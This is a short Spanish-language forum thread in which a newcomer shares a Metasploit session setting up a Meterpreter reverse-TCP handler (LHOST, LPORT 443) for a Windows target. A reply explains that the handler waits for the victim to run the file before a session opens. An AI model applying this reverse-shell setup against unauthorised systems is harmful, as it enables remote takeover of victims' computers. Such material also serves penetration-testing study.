Título: Porque termina el proceso de escucha en metasploit? Publicado por: j0x1_zurc en 1 Septiembre 2017, 04:51 am El problema es que cuando termino de configurar la consola de metasploit para hacer un ataque en windows, termina el proceso de escuccha, y queda algo como esto:
msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.3 LHOST => 192.168.1.3 msf exploit(handler) > set LPORT 443 LPORT => 443 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.1.3 yes The listen address LPORT 443 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit
y hasta alli queda, no se si tengo algo malo, y me puedan corregir? tambien,anteriormente, no funcionaba el payload cuando se abria el programa en windows, se quedaba atascado en esto: msf exploit(handler) > exploit
PD: Soy nuevo en esto. · Los temas van en su respectivo subforo >aquí las reglas del foro (http://foro.elhacker.net/reglas.htm) -Engel Lex Título: Re: Porque termina el proceso de escucha en metasploit? Publicado por: lilux en 28 Septiembre 2017, 13:29 pm No te preocupes, no es un problema. Eso significa que se queda a la espera de que suceda se ejecute el archivo en la máquina víctima. Una vez que se ejecute el archivo en la máquina víctima, verás como en la máquina atacante muestra una sesión abierta. Tras eso, solo tendrías que acceder a la sesión activa con session -i "n" donde n sería el id de la sesión.
|